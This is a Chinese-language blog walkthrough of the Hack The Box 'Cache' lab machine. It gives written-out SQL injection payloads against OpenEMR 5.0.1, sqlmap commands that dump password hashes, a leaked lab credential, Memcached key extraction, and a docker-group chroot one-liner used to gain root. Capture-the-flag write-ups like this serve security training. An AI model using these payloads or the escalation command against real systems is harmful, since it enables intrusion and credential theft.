HTB-Cache

文章描述了一次渗透测试过程,通过80端口的信息收集,发现OpenEMR系统并利用SQL注入漏洞获取数据,进一步利用Memcached服务反弹shell,最终通过Docker容器实现从luffy用户到root用户的权限提升。
摘要由CSDN通过智能技术生成

请添加图片描述

信息收集

在这里插入图片描述
在这里插入图片描述

80端口

主页是一些hacker的介绍。
在这里插入图片描述
作者介绍能收集可能的用户名ASH以及有一个其他项目可能有用,如下:

“Check out his other projects like Cache:HMS(Hospital Management System) “

在这里插入图片描述
还有一个Contact业务,输入超链接测试是否存在脚本会访问连接。同时也进行sql注入测试,均无收获。
在这里插入图片描述
看看登陆业务。
在这里插入图片描述
随便输入会进入一个建设中的页面。
在这里插入图片描述
目录扫描在这里插入图片描述

在这里插入图片描述
查看与login有关的js,所以说为什么我能随便输入账号密码登录呢。

在这里插入图片描述
还是把这个留在这里吧:ash:H@v3_fun。额,线索断了,别忘了作者还有一个HMS(Hospital Management System)。尝试添加hms.htb并访问。
在这里插入图片描述
在这里插入图片描述
对hms.htb进行目录扫描。
在这里插入图片描述
在http://hms.htb/admin.php发现了OpenEMR的版本是5.0.1(3)。
在这里插入图片描述
http://hms.htb/portal/还有一个患者门户的登陆业务。
在这里插入图片描述
到最后一步发送请求就没动静了。
在这里插入图片描述
知道了具体的版本后可以查看一下版本漏洞。这有一篇5.0.1的漏洞报告
在这里插入图片描述
从中知道sql_patch.php也可以查看版本。
在这里插入图片描述
跟着报告走一遍看看能不能利用成功。
在这里插入图片描述
先到前面的病患门户那个界面。
在这里插入图片描述

再导航到/portal/add_edit_event_user.php
在这里插入图片描述
接着导航到/portal/get_profile.php

在这里插入图片描述
文章所说在这会有几个SQL注入的漏洞。选了个短的方便注入。

add_edit_event_user.php?eid=1 AND EXTRACTVALUE(0,CONCAT(0x5c,VERSION()))

在这里插入图片描述
查询表名1 AND EXTRACTVALUE(0,CONCAT(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database())))

在这里插入图片描述
感觉没显示完全,配合截断看看。

1 AND EXTRACTVALUE(0,CONCAT(0x5c,(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),15,30))))

算了还是用burp suite跑算了。确实有点多。
在这里插入图片描述
先去看看sqlmap怎么说,如果不行就写脚本来跑。貌似这个绕过验证的漏洞是有时间限制。请求复制下来。
在这里插入图片描述
在这里插入图片描述

获取数据库:sqlmap -r res -dbs
在这里插入图片描述
获取表名:sqlmap -r res -D openemr -table
在这里插入图片描述
查看users_secure表:sqlmap -r res -D openemr -T users_secure --dump
在这里插入图片描述
在这里插入图片描述
这样我们有了两个密码,也可能是openemr_admin:xxxxxx
在这里插入图片描述
去试试吧,exploit
在这里插入图片描述
能够执行命令。
在这里插入图片描述

立足

反弹shell。
在这里插入图片描述
有两个用户。
在这里插入图片描述

www-data -> ash

利用我们前面获得的凭证登录ash。
在这里插入图片描述

ash -> luffy

本地的11211端口在监听。

在这里插入图片描述
可能是Memcached。
在这里插入图片描述

Memcached
是一种易于使用的高性能内存数据存储。它提供了一项成熟的可扩展开源解决方案,能够实现亚毫秒级响应时间并用作缓存或会话存储。Memcached
非常热门,可为 Web、移动应用程序、游戏、广告技术和电子商务领域的实时应用程序提供支持。

使用telnet 127.0.0.1 11211连接。
在这里插入图片描述
获取所有key:stats items
在这里插入图片描述
查询items 1的内容:stats cachedump 1 0
在这里插入图片描述
get获取user和passwd:get user get passwd
在这里插入图片描述
先输入ctrl+],再输入quit退出。
在这里插入图片描述
使用我们获取的密码切换到路飞。
在这里插入图片描述

luffy -> root

查看id能够看到luffy在docker组。

在这里插入图片描述
查看容器。
在这里插入图片描述
有一个ubuntu,挂载它。

docker run -it -v /:/host/ ubuntu chroot /host/ bash (将其挂载到chroot上)

在这里插入图片描述
制作shell。
在这里插入图片描述
退出docker,在根目录发现bash。
在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值